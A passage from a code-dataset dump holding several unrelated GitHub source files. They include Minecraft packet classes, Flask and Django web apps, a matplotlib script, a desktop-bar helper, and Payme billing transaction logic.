self.x = _iter.consume_double(it)\n self.y = _iter.consume_double(it)\n self.z = _iter.consume_double(it)\n self.yaw = _iter.consume_float(it)\n self.pitch = _iter.consume_float(it)\n self.flags = next(it)\n self.teleport_id = _iter.consume_varint(it)\n self.dismount_vehicle = bool(next(it))\n () = it\n\n assert _math.isfinite(self.x)\n assert _math.isfinite(self.y)\n assert _math.isfinite(self.z)\n assert _math.isfinite(self.yaw)\n assert _math.isfinite(self.pitch)\n assert not (self.flags & ~0x1f)\n\n\nclass EntityHeadLook(Packet):\n\n id = 0x3e\n\n def __init__(self, entity_id: int, head_yaw: float) -> None:\n\n super().__init__()\n\n self.entity_id = entity_id\n self.head_yaw = head_yaw\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'head_yaw',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%c' % (\n _byte.render_varint(self.entity_id),\n round(self.head_yaw / 1.40625) & 0xff,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = _iter.consume_varint(it)\n self.head_yaw = next(it) * 1.40625\n () = it\n\n\nclass HeldItemChange(Packet):\n\n id = 0x48\n\n def __init__(self, slot: int = 0) -> None:\n\n super().__init__()\n\n self.slot = slot\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'slot',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%c' % (\n self.slot,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.slot = next(it)\n () = it\n\n assert 0 <= self.slot <= 8\n\n\nclass UpdateViewPosition(Packet):\n\n id = 0x49\n\n def __init__(self, chunk_x: int, chunk_z: int) -> None:\n\n super().__init__()\n\n self.chunk_x = chunk_x\n self.chunk_z = chunk_z\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'chunk_x',\n 'chunk_z',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n _byte.render_varint(self.chunk_x),\n _byte.render_varint(self.chunk_z),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.chunk_x = _iter.consume_varint(it)\n self.chunk_z = _iter.consume_varint(it)\n () = it\n\n\nclass SpawnPosition(Packet):\n\n id = 0x4b\n\n def __init__(self, x: int, y: int, z: int, angle: float) -> None:\n\n super().__init__()\n\n self.x = x\n self.y = y\n self.z = z\n self.angle = angle\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'x',\n 'y',\n 'z',\n 'angle',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n location = (\n (self.x & 0x3_fff_fff) << 38 |\n (self.z & 0x3_fff_fff) << 12 |\n (self.y & 0xfff)\n )\n\n return b'%b%b' % (\n location.to_bytes(8, 'big'),\n _byte.render_float(self.angle),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n location = int.from_bytes(_islice(it, 8), 'big', signed=True)\n\n self.y = location | -0x800 if location & 0x800 else location & 0x7ff\n\n location >>= 12\n self.z = (location | -0x2_000_000 if location & 0x2_000_000\n else location & 0x1_fff_fff)\n\n self.x = location >> 26\n\n self.angle = _iter.consume_float(it)\n () = it\n\n\n# TODO: complete\nclass EntityMetadata(Packet):\n\n id = 0x4d\n\n def __init__(self, entity_id: int, metadata: bytes | bytearray) -> 
None:\n\n super().__init__()\n\n self.entity_id = entity_id\n self.metadata = metadata\n # ...\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'metadata',\n # ...,\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n _byte.render_varint(self.entity_id),\n self.metadata,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = _iter.consume_varint(it)\n self.metadata = bytes(it)\n # ...\n # () = it\n\n\n# TODO: complete\nclass EntityEquipment(Packet):\n\n id = 0x50\n\n def __init__(self, entity_id: int, equipment: bytes | bytearray) -> None:\n\n super().__init__()\n\n self.entity_id = entity_id\n self.equipment = equipment\n # ...\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'equipment',\n # ...,\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n _byte.render_varint(self.entity_id),\n self.equipment,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = _iter.consume_varint(it)\n self.equipment = bytes(it)\n # ...\n # () = it\n\n\nclass TimeUpdate(Packet):\n\n id = 0x59\n\n def __init__(self, world_age: int = 0, time_of_day: int = 0) -> None:\n\n super().__init__()\n\n self.world_age = world_age\n self.time_of_day = time_of_day\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'world_age',\n 'time_of_day',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n self.world_age.to_bytes(8, 'big', signed=True),\n self.time_of_day.to_bytes(8, 'big', signed=True),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.world_age = int.from_bytes(_islice(it, 8), 'big', signed=True)\n self.time_of_day = int.from_bytes(_islice(it, 8), 'big', signed=True)\n () = it\n\n assert self.world_age >= 0\n\n\n# TODO: complete\nclass EntityProperties(Packet):\n\n id = 0x64\n\n def __init__(self, entity_id: int, raw_tail: bytes | bytearray) -> None:\n\n super().__init__()\n\n self.entity_id = entity_id\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n _byte.render_varint(self.entity_id),\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = _iter.consume_varint(it)\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\n# TODO: complete\nclass DeclareRecipes(Packet):\n\n id = 0x66\n\n def __init__(self, raw_tail: bytes) -> None:\n\n super().__init__()\n\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b' % (\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\n# TODO: complete\nclass Tags(Packet):\n\n id = 0x67\n\n def __init__(self, raw_tail: bytes) -> None:\n\n super().__init__()\n\n # ...\n self.raw_tail = 
raw_tail\n\n    def __getstate__(self) -> dict[str, object]:\n\n        return {key: getattr(self, key) for key in [\n            # ...,\n            'raw_tail',\n        ]}\n\n    @property\n    def payload(self) -> bytes | bytearray:\n\n        return b'%b' % (\n            # ...,\n            self.raw_tail,\n        )\n\n    @payload.setter\n    def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n        it = iter(it)\n        # ...\n        self.raw_tail = bytes(it)\n        # () = it\n","repo_name":"blubberdiblub/prodis","sub_path":"src/prodis/packets/play/clientbound.py","file_name":"clientbound.py","file_ext":"py","file_size_in_byte":31418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"39944836362","text":"from flask import Flask, g, request, jsonify, current_app, make_response\nfrom config_example import FlaskConfig\nfrom scraper.scraper import Scraper\nfrom database.databasehandler import DatabaseHandler\nimport imghdr\n\napp = Flask('semantive')\napp.config.from_object(FlaskConfig)\n\ndef get_scraper():\n    return g.setdefault('scraper', Scraper())\n\ndef get_connector():\n    return g.setdefault('db_connector', DatabaseHandler(current_app.config['DATABASE']))\n\n@app.route('/api/scraping-tasks/', methods=['GET'])\ndef get_scraping_tasks():\n    \"\"\"\n    Returns collection of all the scraping tasks in the system\n    :return: all scraping tasks\n    \"\"\"\n    url = request.args.get('website-url')\n    tasks = get_connector().get_tasks_collection(url=url)\n    return jsonify(tasks)\n\n@app.route('/api/scraping-tasks/', methods=['POST'])\ndef create_scraping_task():\n    \"\"\"\n    Create new scraping task and send it the task queue\n    :return: OK if created\n    \"\"\"\n    data = request.get_json()\n    if not data:\n        return 'Bad request', 400\n    url = data.get('url')\n    data_type = data.get('data_type')\n    tag = data.get('tag')\n    if None in (url, data_type, tag):\n        return 'Bad request', 400\n    get_scraper().create_scraping_task(url=url, data_type=data_type, tag=tag)\n    return 'OK'\n\n@app.route('/api/scraping-tasks/<uuid>', methods=['GET'])\ndef get_scraping_task_by_id(uuid):\n    \"\"\"\n    Get information about scraping task with given uuid\n    :param uuid: uuid of the task to return\n    :return: information about given task\n    \"\"\"\n    data = get_connector().get_task(uuid=uuid)\n    if not data:\n        return 'Task with given id does not exist', 404\n    return jsonify(data)\n\n@app.route('/api/images/', methods=['GET'])\ndef get_images():\n    \"\"\"\n    Get collection of all images in the system\n    :return: collection of all images\n    \"\"\"\n    url = request.args.get('website-url')\n    tag = request.args.get('tag')\n    images = get_connector().get_images_collection(url=url, tag=tag)\n    return jsonify(images)\n\n@app.route('/api/images/<id>/', methods=['GET'])\ndef get_image_by_id(id):\n    \"\"\"\n    Return image resource with given id\n    :param id: id of wanted image resource\n    :return:\n    \"\"\"\n    data = get_connector().get_image(id=id)\n    if not data:\n        return 'Image with given id does not exist', 404\n    return jsonify(data)\n\n@app.route('/api/images/<id>/', methods=['DELETE'])\ndef delete_image(id):\n    \"\"\"\n    Delete image resource with given id\n    :param id: id of image to delete\n    :return:\n    \"\"\"\n    data = get_connector().get_image(id=id)\n    if not data:\n        return 'Image with given id does not exist', 404\n    get_connector().delete_image(id=id)\n    return 'Image removed', 204\n\n@app.route('/api/images/<id>/content', methods=['GET'])\ndef get_image_content(id):\n    \"\"\"\n    Return content of an image with given id\n    :param id: id of wanted image\n    :return: image\n    \"\"\"\n    data = 
get_connector().get_image_content(id=id)\n    if not data:\n        return 'Image with given id does not exist', 404\n    content = data.get(\"content\")\n    response = make_response(content, 200)\n    # imghdr.what() returns a format name such as 'png' when given the image bytes,\n    # so detect the format from the content and build a MIME type from it\n    image_format = imghdr.what(None, h=content)\n    response.headers['Content-Type'] = 'image/' + image_format if image_format else 'application/octet-stream'\n    return response\n\n@app.route('/api/texts/', methods=['GET'])\ndef get_texts():\n    \"\"\"\n    Get collection of all texts in the system\n    :return: collection of all texts\n    \"\"\"\n    url = request.args.get('website-url')\n    tag = request.args.get('tag')\n    texts = get_connector().get_texts_collection(url=url, tag=tag)\n    return jsonify(texts)\n\n@app.route('/api/texts/<id>/', methods=['GET'])\ndef get_text_by_id(id):\n    \"\"\"\n    Return text resource with given id\n    :param id: id of wanted text resource\n    \"\"\"\n    data = get_connector().get_text(id=id)\n    if not data:\n        return 'Text with given id does not exist', 404\n    return jsonify(data)\n\n@app.route('/api/texts/<id>/', methods=['DELETE'])\ndef delete_text(id):\n    \"\"\"\n    Delete text resource with given id\n    :param id: id of text to delete\n    :return:\n    \"\"\"\n    data = get_connector().get_text(id=id)\n    if not data:\n        return 'Text with given id does not exist', 404\n    get_connector().delete_text(id=id)\n    return 'Text removed', 204\n\n@app.route('/api/texts/<id>/content', methods=['GET'])\ndef get_text_content(id):\n    \"\"\"\n    Return content of a text with given id\n    :param id: id of wanted text\n    \"\"\"\n    data = get_connector().get_text_content(id=id)\n    if not data:\n        return 'Text with given id does not exist', 404\n    response = make_response(data.get(\"content\"), 200)\n    response.headers['Content-Type'] = 'text/plain'\n    return response\n\n\nif __name__ == '__main__':\n    app.run()","repo_name":"perkam/semantive","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10948589309","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport seaborn\r\ndf = pd.read_csv(\"../references/한국산업안전보건공단_규모별 사고재해자수_12_31_2020.csv\", encoding='cp949')\r\n\r\ncol_name = [df.columns[0]]\r\nfor name in df.columns[1:]:\r\n    col_name.append(name[:4])\r\n\r\ndf.columns = col_name\r\n\r\ndf = df.T\r\ndf = df.rename(columns=df.iloc[0])\r\ndf = df.drop(df.index[0])\r\nprint(df)\r\nfig, ax_base = plt.subplots(figsize=(40,5))\r\n\r\n# collect the Line2D handles so the legend can be built from them\r\nlines = ax_base.plot(df[df.columns[0]], label=df.columns[0])\r\nfor name in df.columns[1:]:\r\n    lines += ax_base.plot(df[name], label=name)\r\nlabs = [l.get_label() for l in lines]\r\nax_base.legend(lines, labs, loc=1)\r\n\r\nax_base.grid()\r\nplt.show()\r\n# line1 = ax1.plot(df[\"\"])\r\n\r\n\r\n\r\n","repo_name":"shadowcat0202/Polytechnics","sub_path":"Project/밴처창업견진대회/python/data-visualization.py","file_name":"data-visualization.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"21271267937","text":"import subprocess\n\nout=subprocess.run([\"wmctrl\", \"-d\"], capture_output=True, text=True).stdout\nbuttons = [\"(box \"]\nfor i, line in enumerate(out.split(\"\\n\")):\n    if len(line) == 0:\n        break\n    splitted = line.split()\n    is_active = splitted[1] == \"*\"\n    name = splitted[-1]\n    css_class = \"active_workspace inner_box\" if is_active else \"workspace\" \n    buttons.append(\"(button :onclick \\\"wmctrl -s \" + str(i) + \"\\\" :class \\\"\" + css_class + \"\\\" \\\"\" + name + \"\\\")\")\nprint(''.join(buttons) + 
")")\n","repo_name":"EmiOnGit/dotfiles","sub_path":"eww/scripts/bar/workspaces.py","file_name":"workspaces.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"7921857959","text":"from django.contrib.auth import login, logout\nfrom django.contrib.auth.forms import AuthenticationForm, UserCreationForm\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.views import View\n\nfrom django.views.generic import DetailView\nfrom tablib import Dataset\nfrom django.shortcuts import get_object_or_404\nfrom .resources import *\nfrom .models import *\n\nfrom django.shortcuts import render\n\n# Create your views here.\ndef start(request):\n    return HttpResponse('start')\n\ndef login_view(request):\n    if request.method == 'POST':\n        form = AuthenticationForm(data=request.POST)\n        if form.is_valid():\n            user = form.get_user()\n            login(request,user)\n            return HttpResponse('Log In Successfully')\n\n    else:\n        form = AuthenticationForm()\n    return render(request,'p1/login.html', {'form':form})\n\ndef signup_view(request):\n    if request.method == 'POST':\n        form = UserCreationForm(data=request.POST)\n        if form.is_valid():\n            user = form.save()\n            login(request,user)\n            return HttpResponse('SignUp Successfully')\n    else:\n        form = UserCreationForm()\n\n    return render(request,'p1/signup.html', {'form':form})\n\ndef logout_view(request):\n    if request.method == 'POST':\n        logout(request)\n    return HttpResponse('Log Out Successfully')\n\n\n\ndef upload_excel(request):\n    if request.method == 'POST':\n        question_resource = QuestionResource()\n        dataset = Dataset()\n        new_question = request.FILES['myfile']\n\n        if not new_question.name.endswith('xlsx'):\n            messages.info(request,'Error')\n            return render(request, 'p1/uploadexcel.html')\n\n        import_data = dataset.load(new_question.read(),format='xlsx')\n        for data in import_data:\n            if data[0] is not None:\n                print(data[0])\n                value = Questions.objects.create(\n                    Question_Text= data[0],\n                    Test= Test.objects.filter(title=data[10]).first(),\n                )\n                value.save()\n\n                for i in range(1,10):\n                    value = Options(\n                        Option_Text= data[i],\n                        Question= Questions.objects.filter(Question_Text=data[0]).first(),\n                    )\n                    value.save()\n\n    return render(request,'p1/uploadexcel.html')\n\n#------------------------------------------------------------------------------------------------\n\nclass result(View):\n    def get(self, request, user, test):\n        res = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n        set = Answers.objects.filter(user=user).filter(Option__Question__Test=test)\n        for i in range(set.count()):\n            res[set[i].Option.id%9] += set[i].number\n        print(res)\n        # a view must return a response; return the computed totals as plain text\n        return HttpResponse(str(res))\n\n    ","repo_name":"navid-ebrahimi/Belbin-Project","sub_path":"p1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23819601938","text":"#!/data/project/nullzerobot/python/bin/python\n\nimport flask.ext.wtf\nfrom flask.ext.wtf import *\nfrom flask import request\nfrom messages import msg\nfrom werkzeug.datastructures import MultiDict\nimport wtforms.validators as v\n\nclass _Form(Form):\n    def __init__(self, *args, **kwargs):\n        args = list(args)\n        if args:\n            self.request = args[0]\n            args[0] = MultiDict(args[0])\n            args[0].update(kwargs)\n        super(_Form, self).__init__(*args, csrf_enabled=False)\n        for field in self.data:\n            field = getattr(self, field)\n            for validator in 
field.validators:\n                if isinstance(validator, v.Required):\n                    field.label.text = (u'{0}{1}').format(\n                        field.label.text, msg['core-required-symbol'])\n\n    def validate(self, data=None):\n        def isInteracting():\n            if request.form:\n                return True\n            for fieldname in self.data:\n                field = getattr(self, fieldname)\n                ignore = False\n                for validator in field.validators:\n                    if isinstance(validator, v.IgnoreMe):\n                        ignore = True\n                        break\n                if not ignore and self.data[fieldname]:\n                    return True\n            return False\n\n        interacting = isInteracting()\n\n        fail = False\n\n        if not super(_Form, self).validate():\n            fail = True\n        if not fail and data:\n            errors = data.validate()\n            for field in errors:\n                getattr(self, field).errors.extend(errors[field])\n            if errors:\n                fail = True\n\n        if fail:\n            if not interacting:\n                for fieldname in self.data:\n                    field = getattr(self, fieldname)\n                    field.errors = []\n            return False\n        return True\n\nflask.ext.wtf.Form = _Form\n","repo_name":"nullzero/wpcgi","sub_path":"wpcgi/package/p_form/p_class.py","file_name":"p_class.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21679327647","text":"from flask import Flask, request, redirect, render_template, session\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://build-a-blog:launchcode@localhost:8889/build-a-blog'\n# Note: The connection string after :// contains the following info:\n# user:password@server:portNumber/databaseName\napp.config['SQLALCHEMY_ECHO'] = True\ndb = SQLAlchemy(app)\n\n\nclass Blog(db.Model):\n\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(120))\n    body = db.Column(db.String(200))\n\n    def __init__(self, name, body):\n        self.name = name\n        self.body = body\n\n\n@app.route('/new_post', methods=['GET', 'POST'])\ndef new_post():\n    name = ''\n    body = ''\n    name_error = ''\n    body_error = ''\n\n    if request.method == 'GET':\n        return render_template('new_post.html')\n    \n    if request.method == 'POST':\n        name = request.form['name']\n        body = request.form['body']\n        if name == '':\n            name_error = \"Please enter a name for your blog\"\n        if body == '':\n            body_error = \"Please enter your blog\"\n\n        if name_error and body_error:\n            return render_template('new_post.html', name_error=name_error, body_error=body_error)\n        elif name_error and not body_error:\n            return render_template('new_post.html', name_error=name_error, body=body)\n        elif body_error and not name_error:\n            return render_template('new_post.html', name=name, body_error=body_error)\n        else:\n            blog = Blog(name, body)\n            db.session.add(blog)\n            db.session.commit()\n            return redirect(\"/individual_blog?id=\" + str(blog.id))\n\n\n@app.route('/individual_blog', methods=['GET'])\ndef individual_blog():\n    blog_id = request.args.get('id')\n    blog = Blog.query.filter_by(id=blog_id).first()\n    return render_template('individual_blog.html', blog=blog)\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n    all_blogs = Blog.query.all()\n    return render_template('blogs.html', title=\"Build A Blog\", all_blogs=all_blogs)\n\n\nif __name__ == \"__main__\":\n    app.run()\n","repo_name":"Judy2001/build-a-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"46270271993","text":"from app.models import db, Board, Pin, environment, 
SCHEMA\n\n\ndef seed_board_pins():\n    board4 = Board(\n        name='Inspirations', user_id=1)\n    pin12 = Pin(\n        title= 'Quotes', description='positive energy', image_URL=\"https://i.pinimg.com/564x/96/51/04/965104b3f041f4a50b829388964e2a18.jpg\", user_id=1)\n    \n    db.session.add(board4)\n    db.session.add(pin12)\n    board4.pins.append(pin12)\n\n    db.session.commit()","repo_name":"HeidiSongg/PinTrendy","sub_path":"app/seeds/board_pins.py","file_name":"board_pins.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"1118904285","text":"# I couldn't fully work out this task - how is it different from the previous one, No. 10? Was it supposed to be done using\n# recursion?\n\ndef min_len(x, y):\n\treturn min(len(x), len(y))\n\ndef zip_clone(obj1, obj2):\n\tobj1, obj2 = list(obj1), list(obj2)\n\tzip_tuple = ((obj1[i], obj2[i]) for i in range(min_len(obj1, obj2)))\n\treturn zip_tuple\n\n\n\n\n\n\na = 'sdf'\nb = [1, 2, 3, 4, 5]\nc = (1, 2, 3, 4, 5)\nd = {1, 2, 3, 4, 5, 6}\ne = {1: 2, 3: 4, 5: 6}\n\n\nprint(list(zip_clone(e, d)))\n\n# Accepted\n","repo_name":"RusQs/educational_projects_python","sub_path":"Module21/02_my_zip_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33623290702","text":"import traceback\nimport uuid\nfrom flask import request\nfrom flask_log_request_id import current_request_id\n\n\nclass AppLogger:\n\n    def __init__(self, app):\n        self.app = app\n        app.before_request(self.before_request)\n        app.after_request(self.after_request)\n        app.teardown_request(self.teardown_request)\n\n    def before_request(self):\n        if current_request_id():\n            request.request_id = current_request_id()\n        elif \"X-Request-Id\" in request.headers:\n            request.request_id = f'{request.headers[\"X-Request-Id\"]},{str(uuid.uuid4())}'\n        else:\n            request.request_id = str(uuid.uuid4())\n\n        data = \"\"\n        try:\n            data = request.get_data().decode(\"utf-8\")\n        except:\n            pass\n\n        self.app.logger.info(f'REQUEST: {request.method} {request.url}')\n        self.app.logger.info(f'REQUEST HEADERS: {request.method} {request.url}\\n{request.headers}')\n        self.app.logger.info(f'REQUEST BODY: {request.method} {request.url}\\n{data}')\n\n    def after_request(self, response):\n        data = \"\"\n        try:\n            data = response.get_data().decode(\"utf-8\")\n        except Exception as e:\n            pass\n\n        self.app.logger.info(f'RESPONSE: {request.method} {request.url} {response.status}')\n        self.app.logger.info(f'RESPONSE BODY: {request.method} {request.url}\\n{data}')\n\n        return response\n\n    def error_handler(self, e):\n        tb = traceback.format_exc()\n        self.app.logger.error(f'ERROR: {request.method} {request.url} 5xx INTERNAL SERVER ERROR\\n{tb}')\n        return e.status_code if hasattr(e, 'status_code') else 500\n\n    def teardown_request(self, e=None):\n        self.app.logger.info(f'TEARDOWN: {request.method} {request.url}')\n        if e:\n            self.error_handler(e)\n","repo_name":"socrateslopes/partner-demo","sub_path":"src/utils/app_logger.py","file_name":"app_logger.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3085423474","text":"import json\nfrom datetime import datetime\n\nfrom django.utils import timezone\n\nfrom .utils.format import BaseFormat\nfrom .utils.pstatus import PaycomStatus\n\nfrom api.models import User, Article\nfrom billing.models import AgentBalance, Transaction 
\n\n\nBILLING_USER = \"urmon-billing\"\nPAYCOM_USER = \"payme\"\n\n\nclass Transactions(PaycomStatus):\n    params = None\n    paycom_transaction_id = None\n    transaction = None\n    order = None\n    formatter = BaseFormat()\n\n    def __init__(self, params):\n        self.params = params\n        self.paycom_transaction_id = params[\"id\"] if \"id\" in params else 0\n\n    def exist(self):\n        try:\n            self.transaction = Transaction.objects.get(\n                transaction_id=self.paycom_transaction_id\n            )\n            return True\n        except Transaction.DoesNotExist:\n            return False\n\n    def save_transaction(self):\n        \"\"\"\n        Since we do not have an order object, the order status is not being updated here\n        Comment:\n        Save transaction with state = 1 and set order state STATE_WAITING_PAY = 1\n        self.transaction = new transaction\n        \"\"\"\n        tour_user = Article.objects.get(id=self.params['account']['tour_id']).author\n        credit = AgentBalance.objects.get(\n            user=tour_user\n        )\n        debit = User.objects.get(id=self.params['account']['user_id']) \n        data = {\n            \"debit\": debit,\n            \"credit\": credit,\n            \"amount\": self.params[\"amount\"],\n            \"state\": self.STATE_CREATED,\n            \"transaction_id\": self.paycom_transaction_id,\n            \"time_millisecond\": self.params[\"time\"],\n        }\n        self.transaction = Transaction.objects.create(**data)\n\n    def check_transaction_state(self, state=None):\n        if state is None:\n            state = self.STATE_CREATED\n        return True if self.transaction.state == state else False\n\n    def transaction_is_expired(self):\n        time_interval = timezone.now() - self.transaction.created_at\n        if (\n            self.formatter.datetime_timedelta_to_milliseconds(_datetime=time_interval)\n            > self.TIMEOUT\n        ):\n            return True\n        else:\n            return False\n\n    def return_transaction_details(self, field=None):\n\n        \"\"\"\n        Comment: state, create_time|perform_time, transaction, receivers\n        \"\"\"\n        if field is None:\n            field = \"created_at\"\n        _datetime = getattr(self.transaction, field)\n        time_in_milliseconds = (\n            self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n                utc_datetime=_datetime\n            )\n        )\n        response = {\n            \"result\": {\n                \"state\": self.transaction.state,\n                \"transaction\": str(self.transaction.id),\n            }\n        }\n        if field == \"created_at\":\n            response[\"result\"][\"create_time\"] = time_in_milliseconds\n        else:\n            response[\"result\"][field] = time_in_milliseconds\n        return json.dumps(response)\n\n    def cancel_transaction(self, reason, state=None):\n        print(\"reason\", reason)\n        print(\"state\", state)\n        if state is None:\n            state = self.STATE_CANCELLED\n        self.transaction.state = state\n\n        self.transaction.cancel_time = timezone.now()\n        self.transaction.reason = reason\n        self.transaction.save()\n\n    def complete_transaction(self):\n        self.transaction.state = self.STATE_COMPLETED\n        self.transaction.perform_time = timezone.now()\n        self.transaction.save()\n\n    def get_transaction_details(self):\n        cancel_time = self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n            utc_datetime=self.transaction.cancel_time\n        )\n        perform_time = self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n            utc_datetime=self.transaction.perform_time\n        )\n        create_time = self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n            utc_datetime=self.transaction.created_at\n        )\n        reason = (\n            int(self.transaction.reason)\n            if self.transaction.reason is not None\n            else None\n        )\n        data = {\n            \"result\": {\n                \"create_time\": create_time,\n                \"perform_time\": perform_time,\n                \"cancel_time\": cancel_time,\n                \"transaction\": str(self.transaction.id),\n                \"state\": self.transaction.state,\n                \"reason\": reason,\n            }\n        }\n        return 
json.dumps(data)\n\n def get_statement(self, _from, _to):\n datetime_from = datetime.utcfromtimestamp(_from / 1000.0)\n datetime_to = datetime.utcfromtimestamp(_to / 1000.0)\n timezone_from = timezone.make_aware(\n datetime_from, timezone.get_current_timezone()\n )\n timezone_to = timezone.make_aware(datetime_to, timezone.get_current_timezone())\n transactions = Transaction.objects.filter(\n created_at__range=[timezone_from, timezone_to], reason__isnull=True\n )\n\n regenerated_transactions = [\n {\n \"id\": item.transaction_id,\n \"time\": item.created_at,\n \"amount\": item.amount,\n \"account\": {\"id\": item.user.id},\n \"create_time\": self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n item.created_at\n ),\n \"perform_time\": self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n item.perform_time\n ),\n \"cancel_time\": 0,\n \"transaction\": item.id,\n \"state\": 2,\n \"reason\": None,\n \"receivers\": [],\n }\n for item in transactions\n ]\n data = {\"result\": {\"transactions\": regenerated_transactions}}\n return json.dumps(data)\n","repo_name":"AFakhriddinov/backnew","sub_path":"payment/utils/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"19214738884","text":"import os\nimport logging\nimport datetime\nimport requests\nimport mock\n\nfrom shotgun_api3.lib import mockgun\n\nfrom test_base import TestBase\nfrom triggers import sg_jira_event_trigger\n\nlogger = logging.getLogger(__name__)\n\n\n# Some constants which can be used across tests\nPROJECT = {\"id\": 1, \"name\": \"Bunny\", \"type\": \"Project\"}\nEVENT = {\n \"attribute_name\": \"sg_status_list\",\n \"created_at\": datetime.datetime(2018, 11, 28, 15, 43, 7),\n \"entity\": {\"id\": 11793, \"name\": \"Art\", \"type\": \"Task\"},\n \"event_type\": \"Shotgun_Task_Change\",\n \"id\": 4044184,\n \"meta\": {\n \"attribute_name\": \"sg_status_list\",\n \"entity_id\": 11793,\n \"entity_type\": \"Task\",\n \"field_data_type\": \"status_list\",\n \"new_value\": \"wtg\",\n \"old_value\": \"fin\",\n \"type\": \"attribute_change\",\n },\n \"project\": PROJECT,\n \"session_uuid\": \"e8b61250-f31b-11e8-bb75-0242ac110004\",\n \"type\": \"EventLogEntry\",\n \"user\": {\"id\": 42, \"name\": \"Ford Escort\", \"type\": \"HumanUser\"},\n}\n\n\ndef mocked_requests_post(*args, **kwargs):\n 